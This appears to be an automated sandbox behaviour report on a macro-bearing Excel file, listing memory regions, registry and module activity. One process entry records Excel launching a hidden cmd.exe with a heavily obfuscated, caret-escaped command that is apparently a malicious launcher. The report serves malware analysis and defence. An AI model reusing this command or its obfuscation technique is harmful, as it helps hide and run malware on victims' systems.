private_0x0000000004230000 0x04230000 0x04232fff Private Memory rw True False False -
private_0x0000000004240000 0x04240000 0x04240fff Private Memory rw True False False -
pagefile_0x0000000004250000 0x04250000 0x04250fff Pagefile Backed Memory rw True False False -
private_0x0000000004260000 0x04260000 0x0426ffff Private Memory rw True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x04270000 0x0428ffff Memory Mapped File r True False False -
c_1255.nls 0x04290000 0x042a0fff Memory Mapped File r False False False -
pagefile_0x00000000042b0000 0x042b0000 0x042b1fff Pagefile Backed Memory r True False False -
private_0x00000000042c0000 0x042c0000 0x042cffff Private Memory rw True False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory rw True False False -
pagefile_0x00000000042e0000 0x042e0000 0x042e1fff Pagefile Backed Memory r True False False -
private_0x00000000042f0000 0x042f0000 0x0436ffff Private Memory rw True False False -
private_0x0000000004370000 0x04370000 0x0446ffff Private Memory rw True False False -
private_0x0000000004470000 0x04470000 0x04481fff Private Memory rw True False False -
private_0x0000000004490000 0x04490000 0x04492fff Private Memory rw True False False -
private_0x00000000044a0000 0x044a0000 0x0451ffff Private Memory rwx True False False -
pagefile_0x0000000004520000 0x04520000 0x0491ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000004920000 0x04920000 0x04921fff Pagefile Backed Memory r True False False -
private_0x0000000004930000 0x04930000 0x04930fff Private Memory rw True False False -
private_0x0000000004940000 0x04940000 0x04a3ffff Private Memory rw True False False -
private_0x0000000004a40000 0x04a40000 0x04a51fff Private Memory rw True False False -
private_0x0000000004a60000 0x04a60000 0x04b5ffff Private Memory rw True False False -
private_0x0000000004b60000 0x04b60000 0x04f5ffff Private Memory rw True False False -
private_0x0000000004f60000 0x04f60000 0x04f60fff Private Memory rw True False False -
private_0x0000000004f70000 0x04f70000 0x04f70fff Private Memory rw True False False -
private_0x0000000004f80000 0x04f80000 0x04f80fff Private Memory rw True False False -
private_0x0000000004f90000 0x04f90000 0x04f90fff Private Memory rw True False False -
private_0x0000000004fa0000 0x04fa0000 0x04fa0fff Private Memory rw True False False -
private_0x0000000004fb0000 0x04fb0000 0x050affff Private Memory rw True False False -
private_0x00000000050b0000 0x050b0000 0x050b0fff Private Memory rw True False False -
private_0x00000000050c0000 0x050c0000 0x050c0fff Private Memory rw True False False -
private_0x00000000050d0000 0x050d0000 0x050d0fff Private Memory rw True False False -
private_0x00000000050e0000 0x050e0000 0x051dffff Private Memory rw True False False -
private_0x00000000051e0000 0x051e0000 0x051e2fff Private Memory rw True False False -
private_0x00000000051f0000 0x051f0000 0x052effff Private Memory rw True False False -
private_0x00000000052f0000 0x052f0000 0x05337fff Private Memory rw True False False -
private_0x0000000005340000 0x05340000 0x0534ffff Private Memory rw True False False -
private_0x0000000005350000 0x05350000 0x0535ffff Private Memory rw True False False -
private_0x0000000005360000 0x05360000 0x05361fff Private Memory rw True False False -
private_0x0000000005370000 0x05370000 0x0546ffff Private Memory rw True False False -
private_0x0000000005470000 0x05470000 0x05470fff Private Memory rw True False False -
private_0x0000000005480000 0x05480000 0x0557ffff Private Memory rw True False False -
pagefile_0x0000000005580000 0x05580000 0x05d7ffff Pagefile Backed Memory rw True False False -
kernelbase.dll.mui 0x05d80000 0x05e3ffff Memory Mapped File rw False False False -
private_0x0000000005e40000 0x05e40000 0x05e40fff Private Memory rw True False False -
private_0x0000000005e50000 0x05e50000 0x05f4ffff Private Memory rw True False False -
pagefile_0x0000000005f50000 0x05f50000 0x06292fff Pagefile Backed Memory r True False False -
segoeui.ttf 0x062a0000 0x0631efff Memory Mapped File r False False False -
private_0x0000000006320000 0x06320000 0x06320fff Private Memory rw True False False -
private_0x0000000006330000 0x06330000 0x06330fff Private Memory rw True False False -
private_0x0000000006340000 0x06340000 0x06340fff Private Memory rw True False False -
private_0x0000000006350000 0x06350000 0x06350fff Private Memory rw True False False -
private_0x0000000006360000 0x06360000 0x0645ffff Private Memory rw True False False -
private_0x0000000006460000 0x06460000 0x064dffff Private Memory rw True False False -
private_0x00000000064e0000 0x064e0000 0x06527fff Private Memory rw True False False -
private_0x0000000006530000 0x06530000 0x06530fff Private Memory rw True False False -
private_0x0000000006540000 0x06540000 0x06540fff Private Memory rw True False False -
private_0x0000000006550000 0x06550000 0x06550fff Private Memory rw True False False -
private_0x0000000006560000 0x06560000 0x06560fff Private Memory rw True False False -
private_0x0000000006570000 0x06570000 0x0666ffff Private Memory rw True False False -
private_0x0000000006670000 0x06670000 0x0676ffff Private Memory rw True False False -
private_0x0000000006770000 0x06770000 0x06770fff Private Memory rw True False False -
private_0x0000000006780000 0x06780000 0x0687ffff Private Memory rw True False False -
private_0x0000000006880000 0x06880000 0x0697ffff Private Memory rw True False False -
private_0x0000000006980000 0x06980000 0x06a7ffff Private Memory rw True False False -
private_0x0000000006a80000 0x06a80000 0x06a80fff Private Memory rw True False False -
private_0x0000000006a90000 0x06a90000 0x06a90fff Private Memory rw True False False -
private_0x0000000006aa0000 0x06aa0000 0x06b1ffff Private Memory rw True False False -
private_0x0000000006b20000 0x06b20000 0x06b20fff Private Memory rw True False False -
For performance reasons, the remaining 373 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Registry (59)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409 - False 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9 - False 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 129, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 180 False 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ 
z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ 
^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) os_pid = 0xac0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (142)
»
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7fefc690000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee5a40000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x7fee5a10000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7feffd80000 True 1
Fn
Load VBE7.DLL base_address = 0x7fee5ce0000 True 3
Fn
Get Handle Unknown module name base_address = 0x13f1d0000 True 1
Fn
Get Handle MSI.DLL base_address = 0x7fefa750000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle USER32 base_address = 0x77a20000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7feffd80000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 3
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7fefa7cf088 True 1
Fn
Get Address Unknown module name function = MsoVBADigSigCallDlg, address_out = 0x7fee5b472c0 True 1
Fn
Get Address Unknown module name function = MsoVbaInitSecurity, address_out = 0x7fee5ab60b0 True 1
Fn
Get Address Unknown module name function = MsoFIEPolicyAndVersion, address_out = 0x7fee5a61a60 True 1
Fn
Get Address Unknown module name function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee5ab5f50 True 1
Fn
Get Address Unknown module name function = MsoFInitOffice, address_out = 0x7fee5a5f000 True 1
Fn
Get Address Unknown module name function = MsoUninitOffice, address_out = 0x7fee5a4e860 True 1
Fn
Get Address Unknown module name function = MsoFGetFontSettings, address_out = 0x7fee5a43fc0 True 1
Fn
Get Address Unknown module name function = MsoRgchToRgwch, address_out = 0x7fee5a52380 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface, address_out = 0x7fee5a47b80 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface2, address_out = 0x7fee5a47b20 True 1
Fn
Get Address Unknown module name function = MsoFCreateControl, address_out = 0x7fee5a48730 True 1
Fn
Get Address Unknown module name function = MsoFLongLoad, address_out = 0x7fee5b83260 True 1
Fn
Get Address Unknown module name function = MsoFLongSave, address_out = 0x7fee5b83280 True 1
Fn
Get Address Unknown module name function = MsoFGetTooltips, address_out = 0x7fee5a51f40 True 1
Fn
Get Address Unknown module name function = MsoFSetTooltips, address_out = 0x7fee5ab6370 True 1
Fn
Get Address Unknown module name function = MsoFLoadToolbarSet, address_out = 0x7fee5aa4590 True 1
Fn
Get Address Unknown module name function = MsoFCreateToolbarSet, address_out = 0x7fee5a455b0 True 1
Fn
Get Address Unknown module name function = MsoHpalOffice, address_out = 0x7fee5a50240 True 1
Fn
Get Address Unknown module name function = MsoFWndProcNeeded, address_out = 0x7fee5a43d10 True 1
Fn
Get Address Unknown module name function = MsoFWndProc, address_out = 0x7fee5a46d30 True 1
Fn
Get Address Unknown module name function = MsoFCreateITFCHwnd, address_out = 0x7fee5a43d40 True 1
Fn
Get Address Unknown module name function = MsoDestroyITFC, address_out = 0x7fee5a4e6f0 True 1
Fn
Get Address Unknown module name function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee5a4df40 True 1
Fn
Get Address Unknown module name function = MsoFGetComponentManager, address_out = 0x7fee5a47bf0 True 1
Fn
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7fee5a4fcd0 True 1
Fn
Get Address Unknown module name function = MsoWideCharToMultiByte, address_out = 0x7fee5a48b20 True 1
Fn
Get Address Unknown module name function = MsoHrRegisterAll, address_out = 0x7fee5b42ef0 True 1
Fn
Get Address Unknown module name function = MsoFSetComponentManager, address_out = 0x7fee5a542c0 True 1
Fn
Get Address Unknown module name function = MsoFCreateStdComponentManager, address_out = 0x7fee5a43e20 True 1
Fn
Get Address Unknown module name function = MsoFHandledMessageNeeded, address_out = 0x7fee5a4ab10 True 1
Fn
Get Address Unknown module name function = MsoPeekMessage, address_out = 0x7fee5a4a7d0 True 1
Fn
Get Address Unknown module name function = MsoFCreateIPref, address_out = 0x7fee5a41550 True 1
Fn
Get Address Unknown module name function = MsoDestroyIPref, address_out = 0x7fee5a4e830 True 1
Fn
Get Address Unknown module name function = MsoChsFromLid, address_out = 0x7fee5a413d0 True 1
Fn
Get Address Unknown module name function = MsoCpgFromChs, address_out = 0x7fee5a46660 True 1
Fn
Get Address Unknown module name function = MsoSetLocale, address_out = 0x7fee5a41500 True 1
Fn
Get Address Unknown module name function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee5a43dd0 True 1
Fn
Get Address Unknown module name function = MsoSetVbaInterfaces, address_out = 0x7fee5b471e0 True 1
Fn
Get Address Unknown module name function = MsoGetControlInstanceId, address_out = 0x7fee5b16d10 True 1
Fn
Get Address Unknown module name function = VbeuiFIsEdpEnabled, address_out = 0x7fee5b898e0 True 1
Fn
Get Address Unknown module name function = VbeuiEnterpriseProtect, address_out = 0x7fee5b89830 True 1
Fn
Get Address Unknown module name function = SysFreeString, address_out = 0x7feffd81320 True 1
Fn
Get Address Unknown module name function = LoadTypeLib, address_out = 0x7feffd8f1e0 True 1
Fn
Get Address Unknown module name function = RegisterTypeLib, address_out = 0x7feffddcaa0 True 1
Fn
Get Address Unknown module name function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7feffe120d0 True 2
Fn
Get Address Unknown module name function = OleTranslateColor, address_out = 0x7feffdac760 True 1
Fn
Get Address Unknown module name function = OleCreateFontIndirect, address_out = 0x7feffddecd0 True 1
Fn
Get Address Unknown module name function = OleCreatePictureIndirect, address_out = 0x7feffdde840 True 1
Fn
Get Address Unknown module name function = OleLoadPicture, address_out = 0x7feffdef420 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrame, address_out = 0x7feffde9350 True 1
Fn
Get Address Unknown module name function = OleIconToCursor, address_out = 0x7feffdb6e40 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7feffd8a550 True 2
Fn
Get Address Unknown module name function = OleLoadPictureEx, address_out = 0x7feffdef320 True 1
Fn
Get Address Unknown module name function = GetSystemMetrics, address_out = 0x77a394f0 True 1
Fn
Get Address Unknown module name function = MonitorFromWindow, address_out = 0x77a35f08 True 1
Fn
Get Address Unknown module name function = MonitorFromRect, address_out = 0x77a32b00 True 1
Fn
Get Address Unknown module name function = MonitorFromPoint, address_out = 0x77a2ab64 True 1
Fn
Get Address Unknown module name function = EnumDisplayMonitors, address_out = 0x77a35c30 True 1
Fn
Get Address Unknown module name function = GetMonitorInfoA, address_out = 0x77a2a730 True 1
Fn
Get Address Unknown module name function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7feffd82270 True 1
Fn
Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7feffe0dbd0 True 1
Fn
